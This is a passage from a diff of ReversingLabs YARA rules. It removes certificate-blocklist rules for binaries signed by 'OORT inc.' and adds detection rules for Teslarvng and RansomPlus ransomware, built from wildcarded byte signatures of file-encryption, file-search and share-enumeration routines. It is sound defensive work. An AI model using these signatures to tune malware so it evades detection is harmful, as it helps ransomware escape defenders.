24 ?? 8D 45 ?? 89 04 24 E8 + } + $encrypt_files_p2 = { + 8B 55 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? 8D 4A ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D + 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? + ?? 8B 40 ?? 8B 80 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 80 78 ?? ?? 74 ?? 0F BE 40 ?? 89 04 24 B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? + 8B 45 ?? 85 C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D + ?? C9 C3 90 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 8B 00 8B 50 ?? B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? 8B 8D ?? + ?? ?? ?? FF D2 83 EC ?? 0F BE C0 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89 + 85 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 + E8 ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 + C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 3B 85 ?? ?? ?? ?? 74 ?? 89 04 24 + E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 39 85 ?? ?? ?? ?? 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 + 75 ?? EB + } + $find_files_p1 = { + 55 89 E5 81 EC ?? ?? ?? ?? 8D 55 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 89 55 ?? 8D 55 ?? 89 65 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? + 8B 4D ?? 83 C0 ?? 8B 51 ?? 89 45 ?? 8D 45 ?? 89 45 ?? 8B 45 ?? 89 55 ?? 8B 00 89 C1 + 89 45 ?? 01 D1 74 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 45 ?? 83 F8 ?? 89 45 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B + 45 ?? 8D 55 ?? 0F B6 00 88 45 ?? B8 ?? ?? ?? ?? 89 45 ?? C6 04 02 ?? B8 ?? ?? ?? ?? + 2B 45 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 + 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 83 EC ?? 89 81 ?? ?? ?? + ?? 8D 4D ?? 39 CA 74 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? 83 F8 + } + $find_files_p2 = { + 8B 45 ?? 0F 95 00 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? C9 C2 ?? ?? 8D 76 ?? 8D 45 ?? 8B + 4D ?? 89 4C 24 ?? 8B 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? E9 + ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 89 45 ?? 89 55 ?? EB ?? C7 04 24 ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 85 C0 74 ?? 83 E8 + ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 + 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 66 90 55 89 E5 57 56 8D 45 ?? 53 83 EC ?? + 89 45 ?? 8D 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? 89 65 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D ?? C6 45 ?? ?? 8B 83 ?? ?? ?? + ?? 83 F8 ?? 74 ?? 8D 53 ?? 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 EC ?? 85 C0 0F 95 45 ?? 0F B6 45 ?? 8B 75 ?? 88 06 8B 45 ?? 89 04 24 E8 ?? ?? ?? + ?? 0F B6 45 ?? 8D 65 ?? 5B 5E 5F 5D C3 + } + $enum_resources_p1 = { + 55 B8 ?? ?? ?? ?? 89 E5 E8 ?? ?? ?? ?? 29 C4 8D 45 ?? 89 8D ?? ?? ?? ?? 89 A5 ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45 + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C9 C2 ?? ?? + 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 + 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 75 ?? EB + ?? 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 85 ?? ?? ?? ?? 83 85 ?? ?? + ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 83 + } + $enum_resources_p2 = { + 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 74 ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 85 D2 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ?? + ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 48 ?? 3B 48 ?? 0F 84 ?? ?? ?? + ?? 85 C9 74 ?? 8D 41 ?? 8B 95 ?? ?? ?? ?? 89 01 8B 85 ?? ?? ?? ?? 01 C2 89 04 24 89 + 54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B + 48 ?? 8B 85 ?? ?? ?? ?? 83 C1 ?? 89 48 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 39 C8 + 0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 84 ?? ?? + ?? ?? 89 04 24 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC + ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 8D ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? EB + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OORT inc." and (pe.signatures[i].serial=="00:56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b" or pe.signatures[i].serial=="56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b") and 1601006510<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($enum_resources_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_418F6D959A8A0F82Bef07Ceba3603E52 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Teslarvng : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Teslarvng ransomware." author = "ReversingLabs" - id = "ecfb72ef-04c4-55b6-b9e0-e95053e03425" - date = "2023-11-08" - modified = "2023-11-08" + id = "7045b13e-95a5-54da-b540-75d464e7673d" + date = "2020-12-14" + modified = "2020-12-14" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5844-L5862" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6c13c5e85d6e053319193d1d94f216eeec64405c86d15971419078a1ce6c8ac9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Teslarvng.yara#L1-L137" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "670621aa196a80fbb694e4b1690d7da60e881c5b826133939e61cd6c2406ea98" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Teslarvng" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ?? + ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A8 ?? 00 00 A1 ?? ?? ?? ?? ?? ?? ?? ?? EC 56 57 50 + 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? C9 89 4D ?? 89 4D ?? 8B 73 ?? 8B 43 ?? 89 75 + ?? 89 45 ?? 3B F0 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 8D 04 40 C1 E0 ?? 89 45 + ?? 8B 04 02 8B 40 ?? 8B 30 3B F0 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 3D ?? + ?? ?? ?? 10 89 ?? ?? ?? ?? E3 ?? 00 0F 43 05 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? 33 C0 + 83 C9 ?? 66 89 45 ?? 89 4D ?? 8D 4D ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B + C7 72 ?? 8B 07 FF 77 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 0F 10 00 0F 11 85 + ?? ?? ?? ?? F3 0F 7E 40 ?? 83 4D ?? ?? 66 0F D6 45 ?? 66 89 08 8D 8D ?? ?? ?? ?? C7 + 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? + ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? + 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 74 ?? 6A ?? 8D 4D ?? 51 + } + $encrypt_files_p2 = { + FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? + ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? + 8B 41 ?? 89 45 ?? 83 78 ?? ?? 8B 48 ?? 89 4D ?? 72 ?? 8B 00 89 45 ?? C6 45 ?? ?? 33 + C0 83 4D ?? ?? 8D 4D ?? 66 89 45 ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B 47 + ?? 72 ?? 8B 3F 50 57 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? + 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A + ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 6A ?? 8D 45 + ?? 50 FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? + ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? 8B 36 8B 4D ?? 8B 04 02 3B 70 ?? 0F 85 ?? ?? + ?? ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 3B 75 ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D + 4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? + ?? ?? 8B E5 5D 8B E3 5B C2 + } + $find_files = { + FF D6 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 43 ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 78 ?? ?? 72 ?? 8B 00 B2 ?? 8B C8 E8 ?? ?? ?? ?? C6 + 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 + ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 8D 85 ?? ?? ?? ?? 50 + FF B5 ?? ?? ?? ?? 33 C9 8B 85 ?? ?? ?? ?? 03 8D ?? ?? ?? ?? 83 D0 ?? 50 51 FF B5 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? + ?? ?? ?? BA ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B C8 90 66 8B 31 66 3B 32 75 ?? 66 85 F6 + 74 ?? 66 8B 71 ?? 66 3B 72 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 F6 75 ?? 33 C9 EB ?? 1B + C9 83 C9 ?? 85 C9 74 ?? B9 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B + 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? + 85 C0 74 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45 + ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? FF B5 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? FF D6 83 F8 ?? 0F + 84 ?? ?? ?? ?? FF D6 8B D0 + } + $enum_shares_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D + 75 ?? 83 7D ?? ?? 6A ?? 0F 43 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 B8 ?? ?? ?? + ?? 56 66 89 45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 66 89 + 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D + 45 ?? 50 57 FF 15 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 89 7D ?? 50 + 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 6A ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ?? + 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 75 ?? 0F + 43 4D ?? 03 F1 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 0F 43 + 4D ?? 33 C0 66 89 45 ?? 8B C6 2B C1 89 4D ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? FF 75 ?? 8D 4D ?? 56 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? + ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ?? + ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 66 + } + $enum_shares_p2 = { + 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? + ?? 33 F6 8B 55 ?? 85 D2 0F 84 ?? ?? ?? ?? 33 FF 8B 4D ?? 8B 44 39 ?? 85 C0 74 ?? 3D + ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 14 39 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 48 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 66 + 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B 45 ?? 8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? C6 45 ?? + ?? 8B 45 ?? 3B 45 ?? 74 ?? 0F 10 45 ?? C7 40 ?? ?? ?? ?? ?? 0F 11 00 F3 0F 7E 45 ?? + 66 0F D6 40 ?? 33 C0 83 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 + ?? EB ?? 8D 4D ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? + 8B 55 ?? 46 83 C7 ?? 3B F2 0F 82 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 3B 45 ?? 0F 84 ?? ?? + ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 46 ?? 83 7D ?? ?? + 8B 7D ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? 89 45 ?? 83 FF ?? 73 ?? 0F 10 00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 + 85 ?? ?? ?? ?? EB ?? 8B F7 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 CE ?? 3B F0 0F 47 F0 + } + $enum_shares_p3 = { + 8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 0C 7D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 FF 75 ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 8B 7D + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? + 3B F8 0F 84 ?? ?? ?? ?? 2B C7 C1 F8 ?? 69 F0 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 85 ?? + ?? ?? ?? 8D 0C 76 89 45 ?? 8D 04 C8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? + 0F 57 C0 8B B5 ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 75 ?? 89 + 45 ?? C6 45 ?? ?? 66 90 57 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 83 C7 ?? 89 75 ?? 3B 7D ?? + 75 ?? 89 75 ?? C6 45 ?? ?? 89 75 ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D + 85 ?? ?? ?? ?? 8B 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? FF 76 ?? E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ?? + 8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 06 F0 FF 08 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? EB ?? 57 FF 15 ?? ?? ?? ?? 8B 75 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OORT inc." and (pe.signatures[i].serial=="00:41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52" or pe.signatures[i].serial=="41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52") and 1601928240<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($enum_shares_p*)) and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_5378C5Bbeba0D3309A35Bb47F63037F7 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Ransomplus : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects RansomPlus ransomware." author = "ReversingLabs" - id = "7f367505-d7c1-5b8c-83bd-df3fec789d12" - date = "2023-11-08" - modified = "2023-11-08" + id = "ee96eab6-104d-560f-adae-6d5f0ba5d469" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5864-L5882" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a96acf93ca6da4d3bf5177b51996825cd3ea70443577622deccdd11fde579c31" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.RansomPlus.yara#L1-L95" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8ab18c6bcb939eac0e74f015dea773141b5086c5fcb4783666eeac1f395bc208" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "RansomPlus" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OORT inc." and (pe.signatures[i].serial=="00:53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7" or pe.signatures[i].serial=="53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7") and 1601427420<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0Bab6A2Aa84B495D9E554A4C42C0126D : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "7b6d364c-3e27-5314-b604-d44bb408fc4e" - date = "2023-11-08" - modified = "2023-11-08" + strings: + $find_files_1_0 = { + 55 8B EC 83 E4 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 EC ?? + 8B CC 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 01 ?? E8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? + ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ?? + ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? + 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? 